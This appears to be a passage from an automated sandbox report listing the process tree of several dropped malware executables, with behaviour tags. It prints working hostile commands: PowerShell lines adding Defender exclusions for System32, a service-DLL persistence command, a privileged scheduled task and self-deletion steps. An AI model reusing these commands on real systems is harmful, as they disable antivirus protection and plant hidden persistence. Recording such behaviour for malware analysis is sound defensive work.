C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 4764⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\plantrojan.exe"C:\Users\Admin\AppData\Local\Temp\Files\plantrojan.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Files\server.exe"C:\Users\Admin\AppData\Local\Temp\Files\server.exe"3⤵
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Files\343dsxs.exe"C:\Users\Admin\AppData\Local\Temp\Files\343dsxs.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"4⤵
-
C:\Windows\System32\usvcinsta64.exe"C:\Windows\System32\usvcinsta64.exe"5⤵
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"7⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"7⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\System32\cmd.execmd.exe /c mkdir "\\?\C:\Windows \System32"6⤵
-
-
C:\Windows\System32\cmd.execmd.exe /c start "" "C:\Windows \System32\printui.exe"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
-
C:\Windows \System32\printui.exe"C:\Windows \System32\printui.exe"7⤵
- Loads dropped DLL
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"9⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc create x856732 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x856732\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x856732.dat" /f && sc start x8567328⤵
-
C:\Windows\system32\sc.exesc create x856732 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto9⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\services\x856732\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x856732.dat" /f9⤵
- Server Software Component: Terminal Services DLL
- Modifies registry key
-
-
C:\Windows\system32\sc.exesc start x8567329⤵
- Launches sc.exe
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Windows\System32\console_zero.exe"8⤵
-
C:\Windows\System32\console_zero.exe"C:\Windows\System32\console_zero.exe"9⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.execmd.exe /c schtasks /delete /tn "console_zero" /f10⤵
- Indicator Removal: Clear Persistence
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn "console_zero" /f11⤵
-
-
-
C:\Windows\System32\cmd.execmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak9⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\System32\cmd.execmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"6⤵
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak7⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del "C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"4⤵
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak5⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\exe003.exe"C:\Users\Admin\AppData\Local\Temp\Files\exe003.exe"3⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Kopjhb32.exeC:\Windows\system32\Kopjhb32.exe4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\Khhoah32.exeC:\Windows\system32\Khhoah32.exe5⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Kobgnbic.exeC:\Windows\system32\Kobgnbic.exe6⤵
-
C:\Windows\SysWOW64\Kdopfigj.exeC:\Windows\system32\Kdopfigj.exe7⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Kacppmfd.exeC:\Windows\system32\Kacppmfd.exe8⤵
-
C:\Windows\SysWOW64\Klhdmf32.exeC:\Windows\system32\Klhdmf32.exe9⤵
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\Kaemem32.exeC:\Windows\system32\Kaemem32.exe10⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Khoebgkn.exeC:\Windows\system32\Khoebgkn.exe11⤵
-
C:\Windows\SysWOW64\Koimoa32.exeC:\Windows\system32\Koimoa32.exe12⤵
-
C:\Windows\SysWOW64\Kecekkjh.exeC:\Windows\system32\Kecekkjh.exe13⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\Lbgfdo32.exeC:\Windows\system32\Lbgfdo32.exe14⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Ldhblgop.exeC:\Windows\system32\Ldhblgop.exe15⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Lkbkia32.exeC:\Windows\system32\Lkbkia32.exe16⤵
-
C:\Windows\SysWOW64\Lehofj32.exeC:\Windows\system32\Lehofj32.exe17⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Lkdgoa32.exeC:\Windows\system32\Lkdgoa32.exe18⤵
-
C:\Windows\SysWOW64\Lhhhhecc.exeC:\Windows\system32\Lhhhhecc.exe19⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Lbnlenci.exeC:\Windows\system32\Lbnlenci.exe20⤵
-
C:\Windows\SysWOW64\Lelhajbm.exeC:\Windows\system32\Lelhajbm.exe21⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Llfqnc32.exeC:\Windows\system32\Llfqnc32.exe22⤵
-
C:\Windows\SysWOW64\Lacifkga.exeC:\Windows\system32\Lacifkga.exe23⤵
-
C:\Windows\SysWOW64\Mlimccgg.exeC:\Windows\system32\Mlimccgg.exe24⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Mcbepm32.exeC:\Windows\system32\Mcbepm32.exe25⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Mddbhfdb.exeC:\Windows\system32\Mddbhfdb.exe26⤵
-
C:\Windows\SysWOW64\Mdfone32.exeC:\Windows\system32\Mdfone32.exe27⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Mkpgjpjl.exeC:\Windows\system32\Mkpgjpjl.exe28⤵
-
C:\Windows\SysWOW64\Mdikce32.exeC:\Windows\system32\Mdikce32.exe29⤵
-
C:\Windows\SysWOW64\Mcjlalil.exeC:\Windows\system32\Mcjlalil.exe30⤵
-
C:\Windows\SysWOW64\Mdkhidoj.exeC:\Windows\system32\Mdkhidoj.exe31⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Moqlfmnp.exeC:\Windows\system32\Moqlfmnp.exe32⤵
-
C:\Windows\SysWOW64\Maohbimd.exeC:\Windows\system32\Maohbimd.exe33⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Nldmpamj.exeC:\Windows\system32\Nldmpamj.exe34⤵
-
C:\Windows\SysWOW64\Naaehhka.exeC:\Windows\system32\Naaehhka.exe35⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Nhkndbcn.exeC:\Windows\system32\Nhkndbcn.exe36⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Ncqaakbd.exeC:\Windows\system32\Ncqaakbd.exe37⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Ndbnic32.exeC:\Windows\system32\Ndbnic32.exe38⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Nogbgl32.exeC:\Windows\system32\Nogbgl32.exe39⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Modifies registry class
-
C:\Windows\SysWOW64\Nknclm32.exeC:\Windows\system32\Nknclm32.exe40⤵
-
C:\Windows\SysWOW64\Nfdgif32.exeC:\Windows\system32\Nfdgif32.exe41⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Nkqpam32.exeC:\Windows\system32\Nkqpam32.exe42⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Nchhbj32.exeC:\Windows\system32\Nchhbj32.exe43⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Odidjbbj.exeC:\Windows\system32\Odidjbbj.exe44⤵
-
C:\Windows\SysWOW64\Ooohgk32.exeC:\Windows\system32\Ooohgk32.exe45⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Obmecg32.exeC:\Windows\system32\Obmecg32.exe46⤵
-
C:\Windows\SysWOW64\Olbiqp32.exeC:\Windows\system32\Olbiqp32.exe47⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Oclamjhf.exeC:\Windows\system32\Oclamjhf.exe48⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Obanofmo.exeC:\Windows\system32\Obanofmo.exe49⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Ofpgdd32.exeC:\Windows\system32\Ofpgdd32.exe50⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Pmllgn32.exeC:\Windows\system32\Pmllgn32.exe51⤵
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\Pbidoe32.exeC:\Windows\system32\Pbidoe32.exe52⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Pmnhmn32.exeC:\Windows\system32\Pmnhmn32.exe53⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Pieiao32.exeC:\Windows\system32\Pieiao32.exe54⤵
-
C:\Windows\SysWOW64\Pkfbcj32.exeC:\Windows\system32\Pkfbcj32.exe55⤵
-
C:\Windows\SysWOW64\Pijbmnhk.exeC:\Windows\system32\Pijbmnhk.exe56⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\Qeqcao32.exeC:\Windows\system32\Qeqcao32.exe57⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Qmjhhlmo.exeC:\Windows\system32\Qmjhhlmo.exe58⤵
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\Aeemmojj.exeC:\Windows\system32\Aeemmojj.exe59⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Aloeii32.exeC:\Windows\system32\Aloeii32.exe60⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Abimfcid.exeC:\Windows\system32\Abimfcid.exe61⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Modifies registry class
-
C:\Windows\SysWOW64\Aicecm32.exeC:\Windows\system32\Aicecm32.exe62⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Afgflaoj.exeC:\Windows\system32\Afgflaoj.exe63⤵
-
C:\Windows\SysWOW64\Amanik32.exeC:\Windows\system32\Amanik32.exe64⤵
-
C:\Windows\SysWOW64\Abngab32.exeC:\Windows\system32\Abngab32.exe65⤵
-
C:\Windows\SysWOW64\Aihonllk.exeC:\Windows\system32\Aihonllk.exe66⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Modifies registry class
-
C:\Windows\SysWOW64\Apagkfch.exeC:\Windows\system32\Apagkfch.exe67⤵
-
C:\Windows\SysWOW64\Aeopcmbp.exeC:\Windows\system32\Aeopcmbp.exe68⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\Amehdkbb.exeC:\Windows\system32\Amehdkbb.exe69⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\Bcppqe32.exeC:\Windows\system32\Bcppqe32.exe70⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Bealhmpm.exeC:\Windows\system32\Bealhmpm.exe71⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Bpfqff32.exeC:\Windows\system32\Bpfqff32.exe72⤵
-
C:\Windows\SysWOW64\Bfpibpgp.exeC:\Windows\system32\Bfpibpgp.exe73⤵
-
C:\Windows\SysWOW64\Blmakgeg.exeC:\Windows\system32\Blmakgeg.exe74⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Bbgiga32.exeC:\Windows\system32\Bbgiga32.exe75⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\Bmmndj32.exeC:\Windows\system32\Bmmndj32.exe76⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\Bcgfad32.exeC:\Windows\system32\Bcgfad32.exe77⤵
-
C:\Windows\SysWOW64\Bfebno32.exeC:\Windows\system32\Bfebno32.exe78⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Bmojjijg.exeC:\Windows\system32\Bmojjijg.exe79⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Bdicgc32.exeC:\Windows\system32\Bdicgc32.exe80⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Bejoolhb.exeC:\Windows\system32\Bejoolhb.exe81⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Cppcldgh.exeC:\Windows\system32\Cppcldgh.exe82⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Cfjliooe.exeC:\Windows\system32\Cfjliooe.exe83⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Cdnlbcno.exeC:\Windows\system32\Cdnlbcno.exe84⤵
-
C:\Windows\SysWOW64\Cijdjjlf.exeC:\Windows\system32\Cijdjjlf.exe85⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Cliafekj.exeC:\Windows\system32\Cliafekj.exe86⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Cdpigbll.exeC:\Windows\system32\Cdpigbll.exe87⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Cmhmqhbl.exeC:\Windows\system32\Cmhmqhbl.exe88⤵
-
C:\Windows\SysWOW64\Cdbemb32.exeC:\Windows\system32\Cdbemb32.exe89⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\Cfqbin32.exeC:\Windows\system32\Cfqbin32.exe90⤵
-
C:\Windows\SysWOW64\Cmkjfhpj.exeC:\Windows\system32\Cmkjfhpj.exe91⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Cpifbcom.exeC:\Windows\system32\Cpifbcom.exe92⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Cbgbnona.exeC:\Windows\system32\Cbgbnona.exe93⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Dlpggdea.exeC:\Windows\system32\Dlpggdea.exe94⤵
-
C:\Windows\SysWOW64\Dbjodn32.exeC:\Windows\system32\Dbjodn32.exe95⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\Didgqhdk.exeC:\Windows\system32\Didgqhdk.exe96⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Dlbcmdco.exeC:\Windows\system32\Dlbcmdco.exe97⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Ddilnaca.exeC:\Windows\system32\Ddilnaca.exe98⤵
-
C:\Windows\SysWOW64\Dekhei32.exeC:\Windows\system32\Dekhei32.exe99⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Difdfhbi.exeC:\Windows\system32\Difdfhbi.exe100⤵
-
C:\Windows\SysWOW64\Ddlhca32.exeC:\Windows\system32\Ddlhca32.exe101⤵
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\Dgjdpl32.exeC:\Windows\system32\Dgjdpl32.exe102⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Modifies registry class
-
C:\Windows\SysWOW64\Dihalh32.exeC:\Windows\system32\Dihalh32.exe103⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Dlgmhc32.exeC:\Windows\system32\Dlgmhc32.exe104⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\Diknag32.exeC:\Windows\system32\Diknag32.exe105⤵
-
C:\Windows\SysWOW64\Dlijmcmg.exeC:\Windows\system32\Dlijmcmg.exe106⤵
-
C:\Windows\SysWOW64\Dgonklmm.exeC:\Windows\system32\Dgonklmm.exe107⤵
-
C:\Windows\SysWOW64\Ellfcbkd.exeC:\Windows\system32\Ellfcbkd.exe108⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Eceopm32.exeC:\Windows\system32\Eceopm32.exe109⤵
-
C:\Windows\SysWOW64\Emkcme32.exeC:\Windows\system32\Emkcme32.exe110⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\Epioiaak.exeC:\Windows\system32\Epioiaak.exe111⤵
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\Echkelpo.exeC:\Windows\system32\Echkelpo.exe112⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Emnpbepd.exeC:\Windows\system32\Emnpbepd.exe113⤵
-
C:\Windows\SysWOW64\Eplloqoh.exeC:\Windows\system32\Eplloqoh.exe114⤵
-
C:\Windows\SysWOW64\Ecjhklnl.exeC:\Windows\system32\Ecjhklnl.exe115⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Eeidggmp.exeC:\Windows\system32\Eeidggmp.exe116⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Enplhenb.exeC:\Windows\system32\Enplhenb.exe117⤵
- Modifies registry class
-
C:\Windows\SysWOW64\Edjddoeo.exeC:\Windows\system32\Edjddoeo.exe118⤵
-
C:\Windows\SysWOW64\Eekalg32.exeC:\Windows\system32\Eekalg32.exe119⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Modifies registry class
-
C:\Windows\SysWOW64\Eleiiabj.exeC:\Windows\system32\Eleiiabj.exe120⤵
- Adds autorun key to be loaded by Explorer.exe on startup
-
C:\Windows\SysWOW64\Egjnfjbp.exeC:\Windows\system32\Egjnfjbp.exe121⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-